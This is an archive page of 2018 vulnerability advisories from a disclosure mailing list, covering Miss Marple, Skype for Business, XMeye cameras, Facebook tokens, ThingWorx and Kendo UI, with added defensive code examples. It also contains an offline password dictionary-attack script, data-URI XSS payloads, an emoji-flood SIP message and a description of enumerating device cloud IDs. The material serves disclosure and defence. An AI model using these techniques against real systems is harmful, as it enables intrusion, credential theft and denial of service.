[FD] SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition

2018-11-21 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 >
===
  title: Multiple critical vulnerabilities
product: Miss Marple Enterprise Edition
 vulnerable version: <2.0
  fixed version: 2.0
 CVE number: CVE-2018-19233, CVE-2018-19234
 impact: Critical
   homepage: www.comparex-group.com
  found: 2018-05-29
 by: Marius Schwarz (Office Munich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"As a global IT company with thirty years of experience, COMPAREX is one of the
world’s leading IT service providers and no. 1 software license management
company in the EMEA markets. COMPAREX develops innovative services that support
management and leverage software products, leading to an overall improvement
of workforce productivity. COMPAREX serves corporate customers spanning from
small businesses to large international corporations as well as the public
institutions supporting every customer during their digital journey towards
productivity optimization. The portfolio has a solid foundation in license
management, software procurement and cloud services. Substantial professional
and managed services complete the portfolio to support customers with services
tailored to their business demands."

Source: https://comparexusa.com/about-us/about/


Business recommendation:

The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.


Vulnerability overview/description:
---
Application overview:
Miss Marple is inventory software consisting of a client and a server part.
The client (agent) gathers system information and uploads the results to a
remote server as an encrypted ZIP file.

1) Hardcoded AES key (CVE-2018-19233)
A username and an encrypted password were identified in the Miss Marple
Inventory Agent configuration file. By decompiling the binary, the encryption
method was identified as AES-256 with a hardcoded key and initialization vector.
The credentials are used to upload the inventory files to the remote server.
As key and IV are embedded in the agent binary, anyone with a copy of the agent
can recover the plaintext credentials.


2) Uploading arbitrary files
There are two ways an attacker can upload arbitrary files to the server.

2.1) Patching the application binary to bypass the ZIP file extension check

Using this method, it is possible to upload any file to the server, even if
the credentials are unknown to the attacker. This works because every file in
a specific directory gets uploaded, as long as the file has the correct file
extension. The check can be bypassed because the file extension is only
verified on the client side and not on the server side. The binary is patched
by replacing the extension string in MMIA.exe itself with the extension of the
attacker's file, e.g. ".aspx".

2.2) Using cURL to upload arbitrary files

If the credentials are known to the attacker (e.g. recovered as described in
1), tools like cURL can be used to upload arbitrary files to the remote server.

Both ways can be used by an attacker to upload a web shell to the server and
execute arbitrary commands.
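The following Python script is an added example (not part of the advisory and not Miss Marple code) of the server-side check that is missing here: an upload is accepted only if its body is a well-formed ZIP archive whose entry names cannot escape the extraction directory, regardless of what the client claims. The sample archives and the disguised script are constructed for the example.

```python
import io
import zipfile

# Constructed sample inputs for this example (not files from the product):
# a benign inventory archive, a script disguised with a .zip name, and an
# archive whose entry name climbs out of the extraction directory.
DISGUISED_SCRIPT = b'<%@ Page Language="C#" %>\n<!-- constructed stand-in for a web shell body -->\n'


def make_zip(entries):
    """Build an in-memory ZIP archive from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


GOOD_ARCHIVE = make_zip({'inventory/host01.xml': b'<inventory host="host01"/>'})
TRAVERSAL_ARCHIVE = make_zip({'../../wwwroot/shell.aspx': DISGUISED_SCRIPT})


def safe_member_name(name):
    """Reject entry names that could escape the extraction directory on unpack."""
    if not name or '\x00' in name or '\\' in name or ':' in name:
        return False
    parts = name.rstrip('/').split('/')
    return all(part not in ('', '.', '..') for part in parts)


def validate_inventory_upload(filename, data, max_bytes=50 * 1024 * 1024):
    """Server-side acceptance test for an uploaded inventory archive.

    The client-side extension check is worthless once the agent is patched,
    so the decision is made on the content: the body must be a ZIP archive
    whose CRCs verify and whose entry names are safe. Returns (accepted, reason).
    """
    if not filename.lower().endswith('.zip'):
        return False, 'extension not allowed'
    if len(data) > max_bytes:
        return False, 'too large'
    # Local file header signature: an ASPX/PHP script is rejected here already.
    # (An empty archive starts with the end-of-central-directory record instead
    # and is rejected as well, as it carries no inventory.)
    if not data.startswith(b'PK\x03\x04'):
        return False, 'not a ZIP archive (bad magic)'
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not safe_member_name(info.filename):
                    return False, 'unsafe entry name: %r' % info.filename
            if zf.testzip() is not None:
                return False, 'corrupt archive'
    except zipfile.BadZipFile:
        return False, 'not a ZIP archive'
    return True, 'ok'


if __name__ == '__main__':
    for name, body in [('host01.zip', GOOD_ARCHIVE), ('shell.aspx', DISGUISED_SCRIPT),
                       ('shell.zip', DISGUISED_SCRIPT), ('host02.zip', TRAVERSAL_ARCHIVE)]:
        print(name, validate_inventory_upload(name, body))
```

Accepted files should additionally be stored outside the web root under a server-generated name; the client-supplied file name must never decide the storage path, otherwise a ZIP that also parses as a script can still end up somewhere it is executed.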


3) Missing update validation (CVE-2018-19234)
Besides the Miss Marple Inventory Agent, a Miss Marple Updater Service is
running on all clients. This service checks for new versions on the same server.
If files are placed in the right directory on the server, the updater downloads
and executes them with the highest privileges (NT Authority\SYSTEM) without
validating the binaries.
This can also be used to escalate privileges on the clients: by uploading a
web shell using the methods described in vulnerability 2, an attacker gains
sufficient write permissions to access the update directory and to place
malicious files on the server. These are then executed as SYSTEM on all clients
using Miss Marple.


Proof of concept:
-
1) Hardcoded AES key (CVE-2018-19233)
No proof of concept will be provided.

2) Uploading arbitrary files
2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip"
just has to be replaced with the file extension of the uploaded web shell.

2.2) Using cURL to upload arbitrary files
It is possible to upload arbitrary files using cURL and the credentials obtained
in 1).

3) Missing update validation (CVE-2018-19234)
No proof of concept will be provided.


Vulnerable / tested versions:
-
The following versions have been tested and found to be vulnerable:

Miss Marple Inventory Agent / Miss Marple Updater Service 1.13


Vendor contact timeline:

2018-06-

[FD] SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business

2018-11-21 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
===
  title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
 vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
                     Skype for Business 2016 before v16.0.4756.1000
   fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000
                  Skype for Business 2016 v16.0.4756.1000
 CVE number: CVE-2018-8546
 impact: Medium
   homepage: https://www.skype.com/en/business/
  found: 08/2018
 by: Sabine Degen (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Skype for Business (formerly Microsoft Office Communicator and Microsoft
Lync) is an instant messaging client used with Skype for Business Server or
with Skype for Business Online (available with Microsoft Office 365).
Skype for Business is enterprise software."

Source: https://en.wikipedia.org/wiki/Skype_for_Business


Business recommendation:

Assess the impact of this vulnerability on your business. The patch
provided by Microsoft should be installed immediately, especially if
Skype for Business is used for external communication.


Vulnerability overview/description:
---
A large number of emojis (e.g. ~800 kittens) received in one message by the
Skype for Business client freezes the program for a few seconds. This can be
exploited to perform denial of service attacks against Skype for Business
users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat
window of a meeting room in order to freeze the program for all participants
and prevent them from using the chat or seeing the video.

Note that the audio and video streams are handled by a separate thread and are
therefore not affected (i.e. not killed); only the functions related to the
graphical user interface become unusable.


Proof of concept:
-
After sending a large number of emojis (~800 kittens) to a Skype for Business
chat, the program freezes for a few seconds while rendering the chat window.
Continuously sending emojis makes the GUI unusable for the user.
Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: ;tag=82254700;epid=e67b0162bec8
To: ;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:

Contact: 

Content-Type: text/plain;
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]
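As an added illustration (not part of the advisory), the Python snippet below parses a SIP MESSAGE of the shape shown above and flags bodies carrying an unusual number of "(name)" emoticons, the kind of heuristic a server-side filter or monitoring hook could apply to text messages. The message it operates on is a constructed stand-in for the packet above (placeholder addresses, no credentials); the emoticon pattern and the threshold are assumptions.

```python
import re

# Text emoticons in Skype for Business/Lync are "(name)" tokens such as (cat).
# The pattern is an assumption covering that form, not the client's full list.
EMOTICON_RE = re.compile(r'\([a-z]{1,16}\)')


def build_message(body, sender='sip:sender@example.invalid', recipient='sip:user@example.invalid'):
    """Constructed SIP MESSAGE in the shape of the packet above (addresses are placeholders)."""
    body_bytes = body.encode('utf-8')
    return (
        'MESSAGE %s SIP/2.0\r\n'
        'Via: SIP/2.0/tls 127.0.0.1:7490\r\n'
        'From: <%s>;tag=82254700\r\n'
        'To: <%s>;tag=5c302cb624\r\n'
        'Max-Forwards: 70\r\n'
        'CSeq: 12 MESSAGE\r\n'
        'Content-Type: text/plain; charset=UTF-8\r\n'
        'Content-Length: %d\r\n'
        '\r\n' % (recipient, sender, recipient, len(body_bytes))
    ) + body


def parse_sip_message(raw):
    """Split a SIP request into (request line, {lower-cased header: value}, body).

    The body is cut to Content-Length so that trailing data is not counted.
    """
    head, sep, body = raw.partition('\r\n\r\n')
    if not sep:
        raise ValueError('missing header/body separator')
    lines = head.split('\r\n')
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get('content-length', len(body.encode('utf-8'))))
    body = body.encode('utf-8')[:length].decode('utf-8', 'replace')
    return lines[0], headers, body


def emoticon_count(body):
    return len(EMOTICON_RE.findall(body))


def is_emoticon_flood(raw, threshold=100):
    """True for a text MESSAGE carrying more than `threshold` emoticons.

    The threshold is an assumed tuning value: the advisory reports freezes at
    roughly 800 emoticons, while normal chat messages carry a handful at most.
    """
    request_line, headers, body = parse_sip_message(raw)
    if not request_line.startswith('MESSAGE '):
        return False
    if not headers.get('content-type', '').startswith('text/plain'):
        return False
    return emoticon_count(body) > threshold


FLOOD = build_message('(cat)' * 800)        # constructed: the attack message
NORMAL = build_message('see you at 3 (cat)')  # constructed: an ordinary message

if __name__ == '__main__':
    for label, msg in [('flood', FLOOD), ('normal', NORMAL)]:
        print(label, emoticon_count(parse_sip_message(msg)[2]), is_emoticon_flood(msg))
```

Because Skype for Business carries SIP over TLS, such a check has to run where the plaintext is available (the front-end server or a client-side hook), not on the wire.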


Vulnerable / tested versions:
-
The following versions have been identified as vulnerable which were
the latest versions available at the time of the test:

* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit,

Both versions were running on Windows 10 Pro.

According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000


Vendor contact timeline:

2018-08-02: Vulnerability details submitted to Microsoft,
MSRC Case 47060 assigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user
provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue
as the provided workaround is not effective for attacks already
in progress
2018-08-31: Vendor: decided to f

[FD] SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)

2018-10-09 Thread SEC Consult Vulnerability Lab
SEC Consult also published a blog post regarding the identified security issues
with further background information:

Blog: https://r.sec-consult.com/xmeye


SEC Consult Vulnerability Lab Security Advisory < 20181009-0 >
===
  title: Remote Code Execution via XMeye P2P Cloud
product: Xiongmai IP Cameras, NVRs and DVRs
 incl. 3rd party OEM devices
 vulnerable version: see below
  fixed version: -
 CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919
 impact: Critical
   homepage: http://www.xiongmaitech.com/en/
  found: 2018-03-05
 by: Stefan Viehböck (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance
and video intelligence research and development. We devote ourselves to
providing good products and technical services for manufacturers,
wholesalers and service providers, in order to offer a better experience
for our customers. We are a global leading provider of security video
products and technology. Established in 2009, after many years of development,
the headquarters of XM are now located in Yinhu Innovation Center, Fuyang
district, Hangzhou. Total registered capital reaches 60 million.
We now have nearly 2000 employees including a strong R&D team (more
than 300 experienced engineers)."

Source: http://www.xiongmaitech.com/en/index.php/about/company/18


Business recommendation:

SEC Consult has identified highly critical vulnerabilities in Xiongmai
products and the "XMeye P2P Cloud" feature which is being used in many
3rd party OEM devices as well.

The vendor does not provide proper mitigations and hence it is recommended
not to use any products associated with the XMeye P2P Cloud until
all of the identified security issues have been fixed and a thorough
security analysis has been performed by professionals.


Vulnerability overview/description:
---
1) Predictable XMEye Cloud IDs (CVE-2018-17915)
All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a
proprietary, UDP-based protocol that allows users to access their IP cameras or
NVRs/DVRs via the internet. The feature is enabled by default, no setup by the
user is required.

The device initiates and keeps a connection to a Xiongmai cloud server.
All connections between clients and the devices are established via Xiongmai
cloud servers. This approach allows users to connect to devices that are behind
firewalls, NATed etc.

The unique, per-device identifier is the cloud ID. It is a 16 character long
hexadecimal string (e.g. f7e708f21de0fde0).

Anyone who knows the device identifier and the admin credentials can establish a
connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop
application.

The Cloud ID may be unique, but it is not random. It is derived (at boot time)
from the device MAC address using a few simple operations (see
get_sn_from_mac() below).

An attacker can enumerate potential MACs/cloud IDs, find valid ones and then
use the weak default credentials to log in. This allows the attacker to
watch the video feed, change the device configuration and possibly gain remote
code execution using other vulnerabilities.

The XMEye functionality allows an attacker to attack devices that are behind
firewalls, NATed networks etc.

MAC addresses have a well-defined structure: a 3-octet OUI (vendor) followed by
a 3-octet NIC ID. OUIs are assigned by the IEEE. Interestingly, Xiongmai does
not own an OUI but instead uses the OUIs of other companies.

The following OUIs are used by Xiongmai devices (OUIs based on internet
research and scanning, company names based on [1]):
001210 WideRay Corp
001211 Protechna Herbst GmbH & Co. KG
001212 PLUS Corporation
001213 Metrohm AG
001214 Koenig & Bauer AG
001215 iStor Networks, Inc. 
001216 ICP Internet Communication Payment AG
001217 Cisco-Linksys, LLC
001218 ARUZE Corporation
003E0B - Not assigned


We developed a cloud ID scanner that queries the Xiongmai cloud server. The
response indicates whether a device using the given cloud ID is online and
provides the IP of a Xiongmai cloud hop server that is geographically close
to the device. One query is one UDP packet.

We scanned 0.02% of the IDs (randomly chosen) in each OUI range (16 million
possible devices per range) and extrapolated the results.

OUI: 001210; IDs checked 3,365;  Devices online 3; Success rate: 0.1%;
extrapolated devices online: 14,957
OUI: 001211; IDs checked 3,363;  Devices online 9; Success r

[FD] Facebook Platform Hack - Critical Access Token Vulnerabilities

2018-10-04 Thread Vulnerability Lab
Information: The vulnerability about the access token issue was already
reported in December 2017 and January 2018 to the Facebook security
team. In the ticket communication all three researchers disclosing the
issue were denied a reward because the whitehat team of
Facebook did not see the entire risks and combined problematics. Our
researchers tried to report the issues in several ways to protect the public,
but after the tickets were slammed down without good arguments, we
silently waited until the situation popped up again. We recorded videos of
the zero-day issues in several app auth services and noticed the
problematic several times without coming with Facebook to a point where a
solution was issued. Finally there was only one way to deal with it and
this is the way we did it.

Responsible for the disclosure of the vulnerabilities are Lawrence Amer
of team Vulnerability Lab, S*** P and Nirmal Thape. Responsible
for the reports to Facebook and the follow-up communication were Lawrence
Amer and Benjamin Kunz Mejri.

Title: Facebook Inc via Instagram Business - Remote Access Token
Vulnerability (Original Facebook Video)
URL: https://www.youtube.com/watch?v=4Obsd1Qw7uU

Title: Facebook Access Token Vulnerability - Retrieve Data via Instagram
Business
URL: https://www.youtube.com/watch?v=tdLKRky1Da4

Author: Lawrence Amer
https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer

The issue had several vectors and was exploitable using different
functions like "view as", preview and other Facebook functions.

Note: The access tokens have already been invalidated or refreshed, which does
not allow attackers to regain access. Today Facebook replied that it is
evaluating paying the mentioned researchers for the findings. We send
some friendly greetings back to Facebook and as well to the US
supervisory authority watching the case.

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)

2018-10-01 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
===
  title: Password disclosure vulnerability & XSS
product: PTC ThingWorx
 vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
  fixed version: see Solution section
 CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
 impact: critical
   homepage: https://www.ptc.com
  found: 2018-03-13
 by: M. Tomaselli (Office Munich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ThingWorx is more than an IoT platform; it provides the functionality,
flexibility and scalability that businesses need to drive industrial
innovation─including the ability to source, contextualize and synthesize
data while orchestrating processes and delivering powerful web, mobile
and AR experiences."

Source: https://www.ptc.com/en/thingworx8


Business recommendation:

ThingWorx allows configuring Things to communicate with other services over
several protocols (e.g. LDAP integration via a DirectoryServices Thing). In
order to communicate with services that require authentication, ThingWorx
provides functionality to associate credentials with a Thing.

During a brief audit it was noticed that ThingWorx Composer leaks the
following sensitive data:

 1) The PBKDF2WithHmac512 password hash of a user Thing
 2) The AES encrypted password of several Things containing password attributes

Furthermore, the password used for encryption is hard-coded and thus identical
across all installations.

Besides the above mentioned vulnerabilities a reflected cross-site scripting
vulnerability was identified in the ThingWorx SQUEAL search function.

The vendor provides a patch which should be installed immediately.
It is recommended to perform further thorough security audits as the product
may be affected by other potential security vulnerabilities.


Vulnerability overview/description:
---
1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application
users when doing exports with an administrative account. This enables an
attacker to conduct offline brute-force or dictionary attacks against the
obtained password hashes.
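The Python example below (added here, not ThingWorx code) shows what an attacker does with such an export: run a wordlist against the disclosed PBKDF2-HMAC-SHA512 hashes offline, where no lockout or rate limit applies. The record layout, salt length and iteration count are assumptions for the illustration; the exported records and the wordlist are constructed.

```python
import hashlib
import hmac
import os

# Parameters assumed for the illustration; the advisory does not state the
# salt length, iteration count or storage format ThingWorx uses.
ITERATIONS = 1000   # deliberately low so the example runs in well under a second
SALT_BYTES = 16
DKLEN = 64


def pbkdf2_sha512(password, salt, iterations=ITERATIONS):
    return hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), salt, iterations, DKLEN)


def make_record(password, iterations=ITERATIONS):
    """Constructed stand-in for one exported user record."""
    salt = os.urandom(SALT_BYTES)
    return {'salt': salt, 'iterations': iterations,
            'hash': pbkdf2_sha512(password, salt, iterations)}


def verify(record, password):
    """What the server does at login; with the export, the attacker runs it offline."""
    candidate = pbkdf2_sha512(password, record['salt'], record['iterations'])
    return hmac.compare_digest(candidate, record['hash'])


def dictionary_attack(records, wordlist):
    """Try each wordlist entry against each exported record.

    Returns {username: recovered password}. Per-user salts prevent sharing work
    across users, but the cost (len(records) * len(wordlist) PBKDF2 runs) is
    paid entirely on the attacker's hardware, with no lockout or rate limit.
    """
    recovered = {}
    for username, record in records.items():
        for word in wordlist:
            if verify(record, word):
                recovered[username] = word
                break
    return recovered


# Constructed export and wordlist for the example.
EXPORT = {
    'admin': make_record('Summer2018!'),
    'svc_ldap': make_record('7Yx#q!Vp2&LmR9zT'),
}
WORDLIST = ['password', 'thingworx', 'Summer2018!', 'admin123', 'Welcome1']

if __name__ == '__main__':
    print(dictionary_attack(EXPORT, WORDLIST))   # only the weak admin password falls
```

The iteration count only scales the attacker's per-guess cost; it does not turn a leaked hash into a safe one, which is why exports must not contain password hashes at all.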


2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords
(CVE-2018-17217)
A critical information disclosure vulnerability leaks the AES encrypted
passwords of services configured within ThingWorx. Due to a hard-coded
master password in the SecureData class, an attacker is able to decrypt the
obtained passwords, which grants access to the other services. The AES encrypted
password is disclosed in the server response when a user/attacker visits a
Thing that contains credentials.


3) Reflected Cross-Site Scripting (CVE-2018-17218)
The JavaScript part of the ThingWorx SQUEAL search functionality
(searchExpression parameter), which is responsible for parsing the obtained JSON
response, fails to properly sanitize user supplied input. If the victim views
attacker-prepared content (e.g. on a website or in an HTML email), an attacker
is able to execute arbitrary actions in the context of the victim's session.


Proof of concept:
-
The proof of concept has been removed from this advisory.


Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 8.0.1-b39 which was
the latest version available at the time of the test.

The vendor provided further affected version information. See the Solution
section for reference.


Vendor contact timeline:

2018-03-14: Contacting vendor through email
2018-03-16: Advisory sent to vendor via encrypted mail
2018-03 - 2018-09: Multiple phone calls with PTC R&D department
discussing release & multi-party disclosure
2018-08-15: Vendor provided private notifications to customers to give
45 days to upgrade
2018-10-01: Coordinated release of SEC Consult advisory


Solution:
-
The best recommendation is to upgrade to the latest version of ThingWorx,
version 8.3.2 at the time of writing.

In newer versions, the issue of the hard-coded password has been fixed
and the SQUEAL function has been removed.

The minimum upgrade to obtain mitigations for all 3 issues depends
on the version of ThingWorx in use.

For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
For ThingWorx version 8.0.x, upgrade to 8.0.12+
For ThingWorx version 8.1.x, upgrade to 8.1.7+
For ThingWorx version 8.2.x, upgrade to 8.2.4+

The vendor always recommends

Re: [FD] SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor

2018-09-26 Thread SEC Consult Vulnerability Lab
here with correct email subject :)


[FD] SEC Consult SA-20180926-0 ::

2018-09-26 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
===
  title: Stored Cross-Site Scripting
product: Progress Kendo UI Editor
 vulnerable version: v2018.1.221
  fixed version: none, see workaround
 CVE number: CVE-2018-14037
 impact: medium
   homepage: https://www.progress.com/kendo-ui
  found: 2018-04-23
 by: M. Tomaselli (Office Munich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"The Editor allows users to create rich text content by means of a WYSIWYG
interface. This HTML5 widget outputs identical HTML across all major browsers,
follows accessibility standards and provides an API for content manipulation.
The generated widget value is comprised of XHTML markup."

https://www.telerik.com/kendo-ui/editor


Business recommendation:

SEC Consult recommends to implement the workarounds provided by the vendor.


Vulnerability overview/description:
---
The demo application of the Kendo UI Editor which is hosted at
https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
which should protect against cross-site scripting. However, the implemented
Sanitizer fails to catch certain payloads, which allows an attacker to execute
JavaScript in the context of the editor itself.


Proof of concept:
-
The following (incomplete) list of payloads can be used to trigger an alert
box in the API demo application of the Kendo UI Editor:
https://demos.telerik.com/kendo-ui/editor/api

 data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+">

 HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">


After a click on the button, the setValue function on line 513 of the beautified
"api.js" is called:

var setValue = function () {
    editor.value($("#value").val());
};


The value function is implemented in line 64383 of the beautified "kendo.all.js"
file and defined as:

value: function (html) {
    var body = this.body, editorNS = kendo.ui.editor, options = this.options,
        currentHtml = editorNS.Serializer.domToXhtml(body, options.serialization);
    if (html === undefined) {
        return currentHtml;
    }
    if (html == currentHtml) {
        return;
    }
    editorNS.Serializer.htmlToDom(html, body, options.deserialization);
    this.selectionRestorePoint = null;
    this.update();
    this.toolbar.refreshTools();
},

In order to mitigate certain XSS payloads, the editorNS.Serializer.htmlToDom()
function is called; the relevant sanitizing step is shown in the excerpt below:

var Serializer = {
    toEditableHtml: function (html) {
        return (html || '').replace(//g, '')
            .replace(/<(\/?)script([^>]*)>/gi, '<$1k:script$2>')
            .replace(/<img([^>]*)>/gi, function (match) {
                return match.replace(onerrorRe, '');
            })
            .replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, '$1')
            .replace(/^<(table|blockquote)/i, br + '<$1')
            .replace(/^[\s]*(&nbsp;|\u00a0)/i, '$1')
            .replace(/<\/(table|blockquote)>$/i, '' + br);
    },

Although certain payloads are detected and sanitized by the function, the
implemented protection fails to detect the data URI payloads. The payload is
added unescaped to the editor DOM after several other function calls.
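To make the failure mode concrete, the Python example below (added here; an approximation of the logic quoted above, not Kendo's code) contrasts a blacklist sanitizer of the same shape, which only renames script tags and strips onerror, with an allowlist parser that drops every element and attribute it does not know. The payloads are constructed: the base64 strings are the ones from the payload list above, the <object> and <meta> elements wrapping them are an assumption.

```python
import html
import re
from html.parser import HTMLParser

# --- blacklist: same shape as the toEditableHtml() logic quoted above -------
# onerrorRe is not shown on the page; this pattern is an approximation.
ONERROR_RE = re.compile(r'\s*onerror\s*=\s*(?:"[^"]*"|\'[^\']*\'|[^\s>]+)', re.I)


def blacklist_sanitize(markup):
    """Rename <script> to <k:script> and strip onerror from <img>; nothing else."""
    markup = re.sub(r'<(/?)script([^>]*)>', r'<\g<1>k:script\g<2>>', markup, flags=re.I)
    markup = re.sub(r'<img([^>]*)>', lambda m: ONERROR_RE.sub('', m.group(0)), markup, flags=re.I)
    return markup


# --- allowlist: everything not explicitly permitted is dropped ---------------
ALLOWED = {
    'p': set(), 'br': set(), 'b': set(), 'i': set(), 'em': set(), 'strong': set(),
    'ul': set(), 'ol': set(), 'li': set(), 'a': {'href'}, 'img': {'src', 'alt'},
}
VOID = {'br', 'img'}
URL_ATTRS = {'href', 'src'}
CONTENT_HIDING = {'script', 'style', 'object', 'iframe', 'noscript'}


def safe_url(value):
    """Only http(s) and site-relative URLs; data:, javascript: and vbscript: fail."""
    return value.strip().lower().startswith(('http://', 'https://', '/'))


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.hidden = 0   # > 0 while inside an element whose text content is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in CONTENT_HIDING:
            self.hidden += 1
            return
        if self.hidden or tag not in ALLOWED:
            return
        kept = ''
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept += ' %s="%s"' % (name, html.escape(value, quote=True))
        self.out.append('<%s%s>' % (tag, kept))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in CONTENT_HIDING:
            self.hidden = max(0, self.hidden - 1)
            return
        if self.hidden or tag not in ALLOWED or tag in VOID:
            return
        self.out.append('</%s>' % tag)

    def handle_data(self, data):
        if not self.hidden:
            self.out.append(html.escape(data, quote=False))


def allowlist_sanitize(markup):
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return ''.join(parser.out)


# Constructed payloads: the base64 strings are the ones from the list above;
# the <object> and <meta> wrappers are an assumption.
PAYLOADS = [
    '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+"></object>',
    '<meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">',
    '<img src=x onerror=alert(1)>',
    '<script>alert(1)</script>',
]

if __name__ == '__main__':
    for payload in PAYLOADS:
        print('blacklist:', blacklist_sanitize(payload))
        print('allowlist:', repr(allowlist_sanitize(payload)))
```

The blacklist passes the two data: URI payloads through untouched because neither contains a script tag or an onerror attribute; the allowlist never has to know about them, as <object> and <meta> are simply not on the list.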


Vulnerable / tested versions:
-
The following version has been identified to be vulnerable:
* v2018.1.221


Vendor contact timeline:

2018-05-02: Contacting vendor through email for security contact
2018-05-02: Contact person requests to obtain advisory via unencrypted mail
2018-05-08: Advisory delivered through unencrypted email to vendor
2018-05-29: Contacting vendor for current status and informing them about the
publishing date
2018-07-02: Reminded the vendor that the advisory will be published soon
2018-07-02: Multiple emails exchanged, vendor demands that customers need to
issue a support ticket on this case
